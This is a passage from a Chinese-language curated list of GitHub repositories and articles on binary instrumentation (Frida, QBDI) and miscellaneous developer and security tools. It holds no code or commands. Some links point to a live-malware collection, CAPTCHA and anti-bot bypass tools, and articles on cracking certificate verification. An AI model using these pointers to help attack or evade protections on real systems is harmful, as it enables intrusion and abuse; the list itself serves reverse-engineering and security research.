- [**243**星][19d] [JS] [frenchyeti/dexcalibur](https://github.com/frenchyeti/dexcalibur) Dynamic binary instrumentation tool designed for Android application and powered by Frida. It disassembles dex, analyzes it statically, generates hooks, discovers reflected methods, stores intercepted data and does new things from it. Its aim is to be an all-in-one Android reverse engineering platform.
- [**228**星][13d] [C] [frida/frida-gum](https://github.com/frida/frida-gum) Low-level code instrumentation library used by frida-core
#### <a id="74fa0c52c6104fd5656c93c08fd1ba86"></a>与其他工具交互
##### <a id="00a86c65a84e58397ee54e85ed57feaf"></a>未分类
- [**584**星][1y] [Java] [federicodotta/brida](https://github.com/federicodotta/brida) The new bridge between Burp Suite and Frida!
##### <a id="d628ec92c9eea0c4b016831e1f6852b3"></a>IDA
- [**943**星][1y] [Py] [gaasedelen/lighthouse](https://github.com/gaasedelen/lighthouse) 从DBI中收集代码覆盖情况,在IDA/Binja中映射、浏览、查看
- 重复区段: [IDA->插件->调试->DBI数据](#0fbd352f703b507853c610a664f024d1) |[DBI->IntelPin->工具->与其他工具交互->未分类](#e129288dfadc2ab0890667109f93a76d) |[DBI->Frida->工具->与其他工具交互->BinaryNinja](#f9008a00e2bbc7535c88602aa79c8fd8) |
- [coverage-frida](https://github.com/gaasedelen/lighthouse/blob/master/coverage/frida/README.md) 使用Frida收集信息
- [coverage-pin](https://github.com/gaasedelen/lighthouse/blob/master/coverage/pin/README.md) 使用Pin收集覆盖信息
- [插件](https://github.com/gaasedelen/lighthouse/blob/master/plugin/lighthouse_plugin.py) 支持IDA和BinNinja
##### <a id="f9008a00e2bbc7535c88602aa79c8fd8"></a>BinaryNinja
- [**943**星][1y] [Py] [gaasedelen/lighthouse](https://github.com/gaasedelen/lighthouse) 从DBI中收集代码覆盖情况,在IDA/Binja中映射、浏览、查看
- 重复区段: [IDA->插件->调试->DBI数据](#0fbd352f703b507853c610a664f024d1) |[DBI->IntelPin->工具->与其他工具交互->未分类](#e129288dfadc2ab0890667109f93a76d) |[DBI->Frida->工具->与其他工具交互->IDA](#d628ec92c9eea0c4b016831e1f6852b3) |
- [coverage-frida](https://github.com/gaasedelen/lighthouse/blob/master/coverage/frida/README.md) 使用Frida收集信息
- [coverage-pin](https://github.com/gaasedelen/lighthouse/blob/master/coverage/pin/README.md) 使用Pin收集覆盖信息
- [插件](https://github.com/gaasedelen/lighthouse/blob/master/plugin/lighthouse_plugin.py) 支持IDA和BinNinja
##### <a id="ac053c4da818ca587d57711d2ff66278"></a>Radare2
- [**378**星][27d] [JS] [nowsecure/r2frida](https://github.com/nowsecure/r2frida) Radare2 and Frida better together.
- 重复区段: [Radare2->插件->与其他工具交互->未分类](#dfe53924d678f9225fc5ece9413b890f) |
### <a id="a1a7e3dd7091b47384c75dba8f279caf"></a>文章&&视频
- 2019.12 [xakcop] [Cloning RSA tokens with Frida](https://xakcop.com/post/cloning-rsa/)
- 2019.09 [freebuf] [Dwarf:一款基于Pyqt5和Frida的逆向分析调试工具](https://www.freebuf.com/sectool/212123.html)
- 2019.06 [two06] [Fun With Frida](https://medium.com/p/5d0f55dd331a)
- 2019.05 [nsfocus] [基于Frida进行通信数据“解密”](http://blog.nsfocus.net/communication-data-decryption-based-on-frida/)
- 2019.05 [nsfocus] [Frida应用基础及 APP https证书验证破解](http://blog.nsfocus.net/frida%e5%ba%94%e7%94%a8%e5%9f%ba%e7%a1%80%e5%8f%8a-app-https%e8%af%81%e4%b9%a6%e9%aa%8c%e8%af%81%e7%a0%b4%e8%a7%a3/)
- 2019.05 [nsfocus] [Frida应用基础及 APP https证书验证破解](http://blog.nsfocus.net/frida-application-foundation-app-https-certificate-verification-cracking-2/)
- 2019.05 [nsfocus] [Frida应用基础及APP https证书验证破解](http://blog.nsfocus.net/frida-application-foundation-app-https-certificate-verification-cracking/)
- 2019.05 [CodeColorist] [Trace child process with frida on macOS](https://medium.com/p/3b8f0f953f3d)
- 2019.05 [360] [FRIDA脚本系列(四)更新篇:几个主要机制的大更新](https://www.anquanke.com/post/id/177597/)
- 2019.03 [360] [FRIDA脚本系列(三)超神篇:百度AI“调教”抖音AI](https://www.anquanke.com/post/id/175621/)
- 2019.03 [securityinnovation] [Setting up Frida Without Jailbreak on the Latest iOS 12.1.4 Device](https://blog.securityinnovation.com/frida)
- 2019.02 [nowsecure] [Frida 12.3 Debuts New Crash Reporting Feature](https://www.nowsecure.com/blog/2019/02/07/frida-12-3-debuts-new-crash-reporting-feature/)
- 2019.01 [fuzzysecurity] [Windows Hacking 之:ApplicationIntrospection & Hooking With Frida](http://fuzzysecurity.com/tutorials/29.html)
- 2019.01 [fuping] [安卓APP测试之HOOK大法-Frida篇](https://fuping.site/2019/01/25/Frida-Hook-SoulAPP/)
- 2019.01 [360] [FRIDA脚本系列(二)成长篇:动静态结合逆向WhatsApp](https://www.anquanke.com/post/id/169315/)
- 2019.01 [pediy] [[原创]介召几个frida在安卓逆向中使用的脚本以及延时Hook手法](https://bbs.pediy.com/thread-248848.htm)
- 2018.12 [360] [FRIDA脚本系列(一)入门篇:在安卓8.1上dump蓝牙接口和实例](https://www.anquanke.com/post/id/168152/)
- 2018.12 [pediy] [[原创]CVE-2017-4901 VMware虚拟机逃逸漏洞分析【Frida Windows实例】](https://bbs.pediy.com/thread-248384.htm)
- 2018.12 [freebuf] [一篇文章带你领悟Frida的精髓(基于安卓8.1)](https://www.freebuf.com/articles/system/190565.html)
- 2018.12 [pediy] [[原创] Frida操作手册-Android环境准备](https://bbs.pediy.com/thread-248293.htm)
***
## <a id="b2fca17481b109a9b3b0bc290a1a1381"></a>QBDI
### <a id="e72b766bcd3b868c438a372bc365221e"></a>工具
- [**578**星][1y] [C++] [qbdi/qbdi](https://github.com/QBDI/QBDI) A Dynamic Binary Instrumentation framework based on LLVM.
### <a id="2cf79f93baf02a24d95d227a0a3049d8"></a>文章&&视频
- 2019.09 [quarkslab] [QBDI 0.7.0](https://blog.quarkslab.com/qbdi-070.html)
- 2019.07 [freebuf] [教你如何使用QBDI动态二进制检测框架](https://www.freebuf.com/sectool/207898.html)
- 2019.06 [quarkslab] [Android Native Library Analysis with QBDI](https://blog.quarkslab.com/android-native-library-analysis-with-qbdi.html)
- 2018.01 [quarkslab] [Slaying Dragons with QBDI](https://blog.quarkslab.com/slaying-dragons-with-qbdi.html)
- 2018.01 [pentesttoolz] [QBDI – QuarkslaB Dynamic binary Instrumentation](https://pentesttoolz.com/2018/01/13/qbdi-quarkslab-dynamic-binary-instrumentation/)
- 2018.01 [n0where] [QuarkslaB Dynamic binary Instrumentation: QBDI](https://n0where.net/quarkslab-dynamic-binary-instrumentation-qbdi)
***
## <a id="5a9974bfcf7cdf9b05fe7a7dc5272213"></a>其他
### <a id="104bc99e36692f133ba70475ebc8825f"></a>工具
### <a id="8f1b9c5c2737493524809684b934d49a"></a>文章&&视频
- 2018.08 [4hou] [动态二进制插桩的原理和基本实现过程(一)](http://www.4hou.com/binary/13026.html)
# <a id="d3690e0b19c784e104273fe4d64b2362"></a>其他
***
## <a id="9162e3507d24e58e9e944dd3f6066c0e"></a> 文章-新添加的
***
## <a id="1d9dec1320a5d774dc8e0e7604edfcd3"></a>工具-新添加的
- [**19766**星][3m] [Jupyter Notebook] [camdavidsonpilon/probabilistic-programming-and-bayesian-methods-for-hackers](https://github.com/camdavidsonpilon/probabilistic-programming-and-bayesian-methods-for-hackers) aka "Bayesian Methods for Hackers": An introduction to Bayesian methods + probabilistic programming with a computation/understanding-first, mathematics-second point of view. All in pure Python ;)
- [**14349**星][2m] [Py] [corentinj/real-time-voice-cloning](https://github.com/corentinj/real-time-voice-cloning) Clone a voice in 5 seconds to generate arbitrary speech in real-time
- [**11402**星][10d] [Java] [oracle/graal](https://github.com/oracle/graal) Run Programs Faster Anywhere
- [**11213**星][2m] [Jupyter Notebook] [selfteaching/the-craft-of-selfteaching](https://github.com/selfteaching/the-craft-of-selfteaching) One has no future if one couldn't teach themself.
- [**10378**星][11d] [Go] [goharbor/harbor](https://github.com/goharbor/harbor) An open source trusted cloud native registry project that stores, signs, and scans content.
- [**7748**星][10d] [Go] [git-lfs/git-lfs](https://github.com/git-lfs/git-lfs) Git extension for versioning large files
- [**7020**星][14d] [Go] [nats-io/nats-server](https://github.com/nats-io/nats-server) High-Performance server for NATS, the cloud native messaging system.
- [**6894**星][2m] [Go] [sqshq/sampler](https://github.com/sqshq/sampler) A tool for shell commands execution, visualization and alerting. Configured with a simple YAML file.
- [**6454**星][9m] [HTML] [open-power-workgroup/hospital](https://github.com/open-power-workgroup/hospital) OpenPower工作组收集汇总的医院开放数据
- [**6353**星][2m] [Py] [seatgeek/fuzzywuzzy](https://github.com/seatgeek/fuzzywuzzy) Fuzzy String Matching in Python
- [**6055**星][7m] [JS] [haotian-wang/google-access-helper](https://github.com/haotian-wang/google-access-helper) 谷歌访问助手破解版
- [**5876**星][3m] [Gnuplot] [nasa-jpl/open-source-rover](https://github.com/nasa-jpl/open-source-rover) A build-it-yourself, 6-wheel rover based on the rovers on Mars!
- [**5829**星][7m] [JS] [sindresorhus/fkill-cli](https://github.com/sindresorhus/fkill-cli) Fabulously kill processes. Cross-platform.
- [**5753**星][18d] [Go] [casbin/casbin](https://github.com/casbin/casbin) An authorization library that supports access control models like ACL, RBAC, ABAC in Golang
- [**5751**星][9m] [C] [xoreaxeaxeax/movfuscator](https://github.com/xoreaxeaxeax/movfuscator) C编译器,编译的二进制文件只有1个代码块。
- [**5717**星][28d] [JS] [swagger-api/swagger-editor](https://github.com/swagger-api/swagger-editor) Swagger Editor
- [**5420**星][12d] [Py] [mlflow/mlflow](https://github.com/mlflow/mlflow) Open source platform for the machine learning lifecycle
- [**5229**星][4m] [Py] [ytisf/thezoo](https://github.com/ytisf/thezoo) A repository of LIVE malwares for your own joy and pleasure. theZoo is a project created to make the possibility of malware analysis open and available to the public.
- [**5226**星][13d] [Shell] [denisidoro/navi](https://github.com/denisidoro/navi) An interactive cheatsheet tool for the command-line
- [**5116**星][11d] [ASP] [hq450/fancyss](https://github.com/hq450/fancyss) fancyss is a project providing tools to across the GFW on asuswrt/merlin based router.
- [**5007**星][2m] [Py] [snare/voltron](https://github.com/snare/voltron) A hacky debugger UI for hackers
- [**4857**星][13d] [Go] [gcla/termshark](https://github.com/gcla/termshark) A terminal UI for tshark, inspired by Wireshark
- [**4810**星][8m] [Py] [10se1ucgo/disablewintracking](https://github.com/10se1ucgo/disablewintracking) Uses some known methods that attempt to minimize tracking in Windows 10
- [**4747**星][8d] [C++] [paddlepaddle/paddle-lite](https://github.com/PaddlePaddle/Paddle-Lite) Multi-platform high performance deep learning inference engine (『飞桨』多平台高性能深度学习预测引擎)
- [**4651**星][13d] [powershell/win32-openssh](https://github.com/powershell/win32-openssh) Win32 port of OpenSSH
- [**4610**星][1y] [C] [upx/upx](https://github.com/upx/upx) UPX - the Ultimate Packer for eXecutables
- [**4600**星][12m] [Py] [ecthros/uncaptcha2](https://github.com/ecthros/uncaptcha2) defeating the latest version of ReCaptcha with 91% accuracy
- [**4597**星][12d] [C++] [mozilla/rr](https://github.com/mozilla/rr) 记录与重放App的调试执行过程
- [**4541**星][4m] [TS] [apis-guru/graphql-voyager](https://github.com/apis-guru/graphql-voyager)
- [**4352**星][1y] [Py] [lennylxx/ipv6-hosts](https://github.com/lennylxx/ipv6-hosts) Fork of
- [**4314**星][15d] [Rust] [timvisee/ffsend](https://github.com/timvisee/ffsend) Easily and securely share files from the command line
- [**4258**星][12m] [JS] [butterproject/butter-desktop](https://github.com/butterproject/butter-desktop) All the free parts of Popcorn Time
- [**4062**星][3m] [Java] [jesusfreke/smali](https://github.com/jesusfreke/smali) smali/baksmali
- [**4060**星][2m] [JS] [sigalor/whatsapp-web-reveng](https://github.com/sigalor/whatsapp-web-reveng) WhatsApp Web API逆向与重新实现
- [**4003**星][11d] [Go] [dexidp/dex](https://github.com/dexidp/dex) OpenID Connect Identity (OIDC) and OAuth 2.0 Provider with Pluggable Connectors
- [**3980**星][1m] [Rust] [svenstaro/genact](https://github.com/svenstaro/genact) a nonsense activity generator
- [**3960**星][11d] [Py] [angr/angr](https://github.com/angr/angr) A powerful and user-friendly binary analysis platform!
- [**3954**星][16d] [Go] [eranyanay/1m-go-websockets](https://github.com/eranyanay/1m-go-websockets) handling 1M websockets connections in Go
- [**3939**星][15d] [C] [aquynh/capstone](https://github.com/aquynh/capstone) Capstone disassembly/disassembler framework: Core (Arm, Arm64, BPF, EVM, M68K, M680X, MOS65xx, Mips, PPC, RISCV, Sparc, SystemZ, TMS320C64x, Web Assembly, X86, X86_64, XCore) + bindings.
- [**3908**星][12d] [C++] [baldurk/renderdoc](https://github.com/baldurk/renderdoc) RenderDoc is a stand-alone graphics debugging tool.
- [**3844**星][2m] [ObjC] [sveinbjornt/sloth](https://github.com/sveinbjornt/sloth) Mac app that shows all open files, directories and sockets in use by all running processes. Nice GUI for lsof.
- [**3773**星][25d] [jjqqkk/chromium](https://github.com/jjqqkk/chromium) Chromium browser with SSL VPN. Use this browser to unblock websites.
- [**3768**星][2m] [Go] [microsoft/ethr](https://github.com/microsoft/ethr) Ethr is a Network Performance Measurement Tool for TCP, UDP & HTTP.
- [**3749**星][12d] [Go] [hashicorp/consul-template](https://github.com/hashicorp/consul-template) Template rendering, notifier, and supervisor for
- [**3690**星][21d] [JS] [lesspass/lesspass](https://github.com/lesspass/lesspass)
- [**3688**星][29d] [HTML] [hamukazu/lets-get-arrested](https://github.com/hamukazu/lets-get-arrested) This project is intended to protest against the police in Japan
- [**3627**星][26d] [HTML] [consensys/smart-contract-best-practices](https://github.com/consensys/smart-contract-best-practices) A guide to smart contract security best practices
- [**3608**星][9d] [Pascal] [cheat-engine/cheat-engine](https://github.com/cheat-engine/cheat-engine) Cheat Engine. A development environment focused on modding
- [**3538**星][5m] [Shell] [chengr28/revokechinacerts](https://github.com/chengr28/revokechinacerts) Revoke Chinese certificates.
- [**3505**星][16d] [C] [cyan4973/xxhash](https://github.com/cyan4973/xxhash) Extremely fast non-cryptographic hash algorithm
- [**3451**星][19d] [C] [mikebrady/shairport-sync](https://github.com/mikebrady/shairport-sync) AirPlay audio player. Shairport Sync adds multi-room capability with Audio Synchronisation
- [**3306**星][19d] [C] [microsoft/windows-driver-samples](https://github.com/microsoft/windows-driver-samples) This repo contains driver samples prepared for use with Microsoft Visual Studio and the Windows Driver Kit (WDK). It contains both Universal Windows Driver and desktop-only driver samples.
- [**3295**星][15d] [JS] [koenkk/zigbee2mqtt](https://github.com/koenkk/zigbee2mqtt) Zigbee
- [**3289**星][15d] [C] [virustotal/yara](https://github.com/virustotal/yara) The pattern matching swiss knife
- [**3280**星][29d] [Java] [oldmanpushcart/greys-anatomy](https://github.com/oldmanpushcart/greys-anatomy) Java诊断工具
- [**3243**星][14d] [Shell] [gfw-breaker/ssr-accounts](https://github.com/gfw-breaker/ssr-accounts) 一键部署Shadowsocks服务;免费Shadowsocks账号分享;免费SS账号分享; 翻墙;无界,自由门,SquirrelVPN
- [**3233**星][25d] [C] [tmate-io/tmate](https://github.com/tmate-io/tmate) Instant Terminal Sharing
- [**3219**星][2m] [TS] [google/incremental-dom](https://github.com/google/incremental-dom) An in-place DOM diffing library
- [**3202**星][1y] [Shell] [toyodadoubi/doubi](https://github.com/toyodadoubi/doubi) 一个逗比写的各种逗比脚本~
- [**3188**星][11d] [C] [meetecho/janus-gateway](https://github.com/meetecho/janus-gateway) Janus WebRTC Server
- [**3131**星][2m] [CSS] [readthedocs/sphinx_rtd_theme](https://github.com/readthedocs/sphinx_rtd_theme) Sphinx theme for readthedocs.org
- [**3129**星][13d] [C] [qemu/qemu](https://github.com/qemu/qemu) Official QEMU mirror. Please see
- [**3120**星][11d] [Go] [tencent/bk-cmdb](https://github.com/tencent/bk-cmdb) 蓝鲸智云配置平台(BlueKing CMDB)
- [**3108**星][1m] [C] [unicorn-engine/unicorn](https://github.com/unicorn-engine/unicorn) Unicorn CPU emulator framework (ARM, AArch64, M68K, Mips, Sparc, X86)
- [**3052**星][4m] [C++] [google/robotstxt](https://github.com/google/robotstxt) The repository contains Google's robots.txt parser and matcher as a C++ library (compliant to C++11).
- [**2993**星][18d] [Py] [quantaxis/quantaxis](https://github.com/quantaxis/quantaxis) 支持任务调度 分布式部署的 股票/期货/自定义市场 数据/回测/模拟/交易/可视化 纯本地PAAS量化解决方案
- [**2980**星][14d] [ObjC] [google/santa](https://github.com/google/santa) 用于Mac系统的二进制文件白名单/黑名单系统
- [**2948**星][1m] [C] [libfuse/sshfs](https://github.com/libfuse/sshfs) A network filesystem client to connect to SSH servers
- [**2898**星][8m] [C] [p-h-c/phc-winner-argon2](https://github.com/p-h-c/phc-winner-argon2) The password hash Argon2, winner of PHC
- [**2872**星][14d] [C] [lxc/lxc](https://github.com/lxc/lxc) LXC - Linux Containers
- [**2854**星][1m] [Py] [espressif/esptool](https://github.com/espressif/esptool) ESP8266 and ESP32 serial bootloader utility
- [**2848**星][6m] [Py] [instantbox/instantbox](https://github.com/instantbox/instantbox) Get a clean, ready-to-go Linux box in seconds.
- [**2833**星][2m] [Assembly] [cirosantilli/x86-bare-metal-examples](https://github.com/cirosantilli/x86-bare-metal-examples) 几十个用于学习 x86 系统编程的小型操作系统
- [**2815**星][20d] [C] [processhacker/processhacker](https://github.com/processhacker/processhacker) A free, powerful, multi-purpose tool that helps you monitor system resources, debug software and detect malware.
- [**2808**星][10m] [Py] [plasma-disassembler/plasma](https://github.com/plasma-disassembler/plasma) Plasma is an interactive disassembler for x86/ARM/MIPS. It can generates indented pseudo-code with colored syntax.
- [**2789**星][13d] [C++] [qtox/qtox](https://github.com/qtox/qtox) qTox is a chat, voice, video, and file transfer IM client using the encrypted peer-to-peer Tox protocol.
- [**2772**星][2m] [JS] [trufflesuite/ganache-cli](https://github.com/trufflesuite/ganache-cli) Fast Ethereum RPC client for testing and development
- [**2760**星][10d] [TS] [webhintio/hint](https://github.com/webhintio/hint)
- [**2718**星][3m] [Py] [drivendata/cookiecutter-data-science](https://github.com/drivendata/cookiecutter-data-science) A logical, reasonably standardized, but flexible project structure for doing and sharing data science work.
- [**2687**星][11d] [Go] [adguardteam/adguardhome](https://github.com/adguardteam/adguardhome) Network-wide ads & trackers blocking DNS server
- [**2631**星][8m] [leandromoreira/linux-network-performance-parameters](https://github.com/leandromoreira/linux-network-performance-parameters) Learn where some of the network sysctl variables fit into the Linux/Kernel network flow
- [**2627**星][23d] [JS] [popcorn-official/popcorn-desktop](https://github.com/popcorn-official/popcorn-desktop) Popcorn Time is a multi-platform, free software BitTorrent client that includes an integrated media player. Desktop ( Windows / Mac / Linux ) a Butter-Project Fork
- [**2621**星][2m] [pditommaso/awesome-pipeline](https://github.com/pditommaso/awesome-pipeline) A curated list of awesome pipeline toolkits inspired by Awesome Sysadmin
- [**2619**星][2m] [Swift] [zhuhaow/nekit](https://github.com/zhuhaow/nekit) A toolkit for Network Extension Framework
- [**2615**星][1m] [JS] [knownsec/kcon](https://github.com/knownsec/kcon) KCon is a famous Hacker Con powered by Knownsec Team.
- [**2587**星][10d] [C] [esnet/iperf](https://github.com/esnet/iperf) A TCP, UDP, and SCTP network bandwidth measurement tool
- [**2535**星][3m] [Java] [jboss-javassist/javassist](https://github.com/jboss-javassist/javassist) Java bytecode engineering toolkit
- [**2478**星][11m] [JS] [weixin/miaow](https://github.com/weixin/Miaow) A set of plugins for Sketch include drawing links & marks, UI Kit & Color sync, font & text replacing.
- [**2474**星][25d] [JS] [vitaly-t/pg-promise](https://github.com/vitaly-t/pg-promise) PostgreSQL interface for Node.js
- [**2391**星][21d] [Java] [mock-server/mockserver](https://github.com/mock-server/mockserver) MockServer enables easy mocking of any system you integrate with via HTTP or HTTPS with clients written in Java, JavaScript and Ruby. MockServer also includes a proxy that introspects all proxied traffic including encrypted SSL traffic and supports Port Forwarding, Web Proxying (i.e. HTTP proxy), HTTPS Tunneling Proxying (using HTTP CONNECT) and…
- [**2364**星][10d] [C] [domoticz/domoticz](https://github.com/domoticz/domoticz) monitor and configure various devices like: Lights, Switches, various sensors/meters like Temperature, Rain, Wind, UV, Electra, Gas, Water and much more
- [**2345**星][4m] [Go] [vuvuzela/vuvuzela](https://github.com/vuvuzela/vuvuzela) Private messaging system that hides metadata
- [**2344**星][16d] [C] [tsl0922/ttyd](https://github.com/tsl0922/ttyd) Share your terminal over the web
- [**2340**星][2m] [JS] [pa11y/pa11y](https://github.com/pa11y/pa11y) Pa11y is your automated accessibility testing pal
- [**2305**星][2m] [C] [moby/hyperkit](https://github.com/moby/hyperkit) A toolkit for embedding hypervisor capabilities in your application
- [**2286**星][1m] [JS] [talkingdata/inmap](https://github.com/talkingdata/inmap) 大数据地理可视化
- [**2260**星][13d] [dumb-password-rules/dumb-password-rules](https://github.com/dumb-password-rules/dumb-password-rules) Shaming sites with dumb password rules.
- [**2217**星][14d] [Go] [google/mtail](https://github.com/google/mtail) extract whitebox monitoring data from application logs for collection in a timeseries database
- [**2214**星][18d] [getlantern/lantern-binaries](https://github.com/getlantern/lantern-binaries) Lantern installers binary downloads.
- [**2211**星][1m] [C++] [google/bloaty](https://github.com/google/bloaty) Bloaty McBloatface: a size profiler for binaries
- [**2194**星][13d] [C] [armmbed/mbedtls](https://github.com/armmbed/mbedtls) An open source, portable, easy to use, readable and flexible SSL library
- [**2137**星][19d] [Assembly] [pret/pokered](https://github.com/pret/pokered) disassembly of Pokémon Red/Blue
- [**2132**星][20d] [goq/telegram-list](https://github.com/goq/telegram-list) List of telegram groups, channels & bots // Список интересных групп, каналов и ботов телеграма // Список чатов для программистов
- [**2093**星][10d] [C] [flatpak/flatpak](https://github.com/flatpak/flatpak) Linux application sandboxing and distribution framework
- [**2092**星][26d] [swiftonsecurity/sysmon-config](https://github.com/swiftonsecurity/sysmon-config) Sysmon configuration file template with default high-quality event tracing
- [**2080**星][2m] [Go] [theupdateframework/notary](https://github.com/theupdateframework/notary) Notary is a project that allows anyone to have trust over arbitrary collections of data
- [**2053**星][4m] [Go] [maxmcd/webtty](https://github.com/maxmcd/webtty) Share a terminal session over WebRTC
- [**2053**星][24d] [C#] [mathewsachin/captura](https://github.com/mathewsachin/captura) Capture Screen, Audio, Cursor, Mouse Clicks and Keystrokes
- [**2052**星][13d] [C++] [openthread/openthread](https://github.com/openthread/openthread) OpenThread released by Google is an open-source implementation of the Thread networking protocol
- [**2031**星][10m] [C] [dekunukem/nintendo_switch_reverse_engineering](https://github.com/dekunukem/nintendo_switch_reverse_engineering) A look at inner workings of Joycon and Nintendo Switch
- [**2003**星][2m] [C++] [asmjit/asmjit](https://github.com/asmjit/asmjit) Complete x86/x64 JIT and AOT Assembler for C++
- [**1998**星][2m] [Swift] [github/softu2f](https://github.com/github/softu2f) Software U2F authenticator for macOS
- [**1955**星][11d] [Go] [solo-io/gloo](https://github.com/solo-io/gloo) An Envoy-Powered API Gateway
- [**1949**星][17d] [C] [microsoft/procdump-for-linux](https://github.com/microsoft/procdump-for-linux) Linux 版本的 ProcDump
- [**1930**星][22d] [C++] [mhammond/pywin32](https://github.com/mhammond/pywin32) Python for Windows (pywin32) Extensions
- [**1907**星][18d] [Go] [minishift/minishift](https://github.com/minishift/minishift) Run OpenShift 3.x locally
- [**1899**星][25d] [C++] [acidanthera/lilu](https://github.com/acidanthera/Lilu) Arbitrary kext and process patching on macOS
- [**1877**星][25d] [Java] [adoptopenjdk/jitwatch](https://github.com/adoptopenjdk/jitwatch) Log analyser / visualiser for Java HotSpot JIT compiler. Inspect inlining decisions, hot methods, bytecode, and assembly. View results in the JavaFX user interface.
- [**1863**星][10d] [C++] [pytorch/glow](https://github.com/pytorch/glow) Compiler for Neural Network hardware accelerators
- [**1859**星][12m] [C++] [googlecreativelab/open-nsynth-super](https://github.com/googlecreativelab/open-nsynth-super) Open NSynth Super is an experimental physical interface for the NSynth algorithm
- [**1854**星][19d] [C] [github/glb-director](https://github.com/github/glb-director) GitHub Load Balancer Director and supporting tooling.
- [**1852**星][1y] [Py] [jinnlynn/genpac](https://github.com/jinnlynn/genpac) PAC/Dnsmasq/Wingy file Generator, working with gfwlist, support custom rules.
- [**1851**星][1y] [Java] [yeriomin/yalpstore](https://github.com/yeriomin/yalpstore) Download apks from Google Play Store
- [**1848**星][9m] [Py] [netflix-skunkworks/stethoscope](https://github.com/Netflix-Skunkworks/stethoscope) Personalized, user-focused recommendations for employee information security.
- [**1846**星][3m] [C] [retroplasma/earth-reverse-engineering](https://github.com/retroplasma/earth-reverse-engineering) Reversing Google's 3D satellite mode
- [**1837**星][3m] [Go] [influxdata/kapacitor](https://github.com/influxdata/kapacitor) Open source framework for processing, monitoring, and alerting on time series data
- [**1827**星][13d] [Py] [trailofbits/manticore](https://github.com/trailofbits/manticore) 动态二进制分析工具,支持符号执行(symbolic execution)、污点分析(taint analysis)、运行时修改。
- [**1816**星][29d] [Go] [gdamore/tcell](https://github.com/gdamore/tcell) Tcell is an alternate terminal package, similar in some ways to termbox, but better in others.
- [**1786**星][1m] [C++] [apitrace/apitrace](https://github.com/apitrace/apitrace) Tools for tracing OpenGL, Direct3D, and other graphics APIs
- [**1781**星][26d] [PHP] [ezyang/htmlpurifier](https://github.com/ezyang/htmlpurifier) Standards compliant HTML filter written in PHP
- [**1779**星][29d] [17mon/china_ip_list](https://github.com/17mon/china_ip_list)
- [**1761**星][1y] [JS] [puppeteer/examples](https://github.com/puppeteer/examples) Use case-driven examples for using Puppeteer and headless chrome
- [**1761**星][13d] [C] [google/wuffs](https://github.com/google/wuffs) Wrangling Untrusted File Formats Safely
- [**1756**星][16d] [PHP] [wordpress/wordpress-coding-standards](https://github.com/wordpress/wordpress-coding-standards) PHP_CodeSniffer rules (sniffs) to enforce WordPress coding conventions
- [**1727**星][8d] [TSQL] [brentozarultd/sql-server-first-responder-kit](https://github.com/brentozarultd/sql-server-first-responder-kit) sp_Blitz, sp_BlitzCache, sp_BlitzFirst, sp_BlitzIndex, and other SQL Server scripts for health checks and performance tuning.
- [**1722**星][4m] [Py] [anorov/cloudflare-scrape](https://github.com/anorov/cloudflare-scrape) A Python module to bypass Cloudflare's anti-bot page.
- [**1714**星][1m] [Go] [hashicorp/memberlist](https://github.com/hashicorp/memberlist) Golang package for gossip based membership and failure detection
- [**1698**星][21d] [C++] [microsoft/detours](https://github.com/microsoft/detours) Detours is a software package for monitoring and instrumenting API calls on Windows. It is distributed in source code form.
- [**1676**星][10d] [Java] [apache/geode](https://github.com/apache/geode) Apache Geode
- [**1672**星][7m] [C] [easyhook/easyhook](https://github.com/easyhook/easyhook) The reinvention of Windows API Hooking
- [**1668**星][3m] [Py] [boppreh/keyboard](https://github.com/boppreh/keyboard) Hook and simulate global keyboard events on Windows and Linux.
- [**1659**星][25d] [JS] [tylerbrock/mongo-hacker](https://github.com/tylerbrock/mongo-hacker) MongoDB Shell Enhancements for Hackers
- [**1650**星][13d] [sarojaba/awesome-devblog](https://github.com/sarojaba/awesome-devblog) 어썸데브블로그. 국내 개발 블로그 모음(only 실명으로).
- [**1637**星][12d] [JS] [efforg/privacybadger](https://github.com/efforg/privacybadger) Privacy Badger is a browser extension that automatically learns to block invisible trackers.
- [**1624**星][9m] [JS] [localtunnel/server](https://github.com/localtunnel/server) server for localtunnel.me
- [**1620**星][16d] [C++] [lief-project/lief](https://github.com/lief-project/lief) Library to Instrument Executable Formats
- [**1592**星][2m] [ObjC] [ealeksandrov/provisionql](https://github.com/ealeksandrov/provisionql) Quick Look plugin for apps and provisioning profile files
- [**1584**星][1y] [C] [qihoo360/phptrace](https://github.com/qihoo360/phptrace) A tracing and troubleshooting tool for PHP scripts.
- [**1572**星][1m] [C] [codahale/bcrypt-ruby](https://github.com/codahale/bcrypt-ruby) Ruby binding for the OpenBSD bcrypt() password hashing algorithm, allowing you to easily store a secure hash of your users' passwords.
- [**1562**星][1m] [C] [p-gen/smenu](https://github.com/p-gen/smenu) Terminal utility that reads words from standard input or from a file and creates an interactive selection window just below the cursor. The selected word(s) are sent to standard output for further processing.
- [**1562**星][19d] [Java] [gchq/gaffer](https://github.com/gchq/Gaffer) A large-scale entity and relation database supporting aggregation of properties
- [**966**星][7m] [PHP] [jenssegers/optimus](https://github.com/jenssegers/optimus) id transformation With this library, you can transform your internal id's to obfuscated integers based on Knuth's integer has和
- [**906**星][7m] [C++] [dfhack/dfhack](https://github.com/DFHack/dfhack) Memory hacking library for Dwarf Fortress and a set of tools that use it
- [**895**星][12m] [JS] [levskaya/jslinux-deobfuscated](https://github.com/levskaya/jslinux-deobfuscated) An old version of Mr. Bellard's JSLinux rewritten to be human readable, hand deobfuscated and annotated.
- [**706**星][1y] [Jupyter Notebook] [anishathalye/obfuscated-gradients](https://github.com/anishathalye/obfuscated-gradients) Obfuscated Gradients Give a False Sense of Security: Circumventing Defenses to Adversarial Examples
- [**658**星][10m] [Jupyter Notebook] [supercowpowers/data_hacking](https://github.com/SuperCowPowers/data_hacking) Data Hacking Project
- [**657**星][1y] [Rust] [endgameinc/xori](https://github.com/endgameinc/xori) Xori is an automation-ready disassembly and static analysis library for PE32, 32+ and shellcode
- [**637**星][21d] [PS] [olafhartong/sysmon-modular](https://github.com/olafhartong/sysmon-modular) sysmon配置模块收集
- [**587**星][6m] [nshalabi/sysmontools](https://github.com/nshalabi/sysmontools) Utilities for Sysmon
- [**568**星][11m] [JS] [raineorshine/solgraph](https://github.com/raineorshine/solgraph) Visualize Solidity control flow for smart contract security analysis.
- [**523**星][2m] [mhaggis/sysmon-dfir](https://github.com/mhaggis/sysmon-dfir) Sources, configuration and how to detect evil things utilizing Microsoft Sysmon.
- [**522**星][4m] [Java] [java-deobfuscator/deobfuscator](https://github.com/java-deobfuscator/deobfuscator) Java 代码反混淆工具
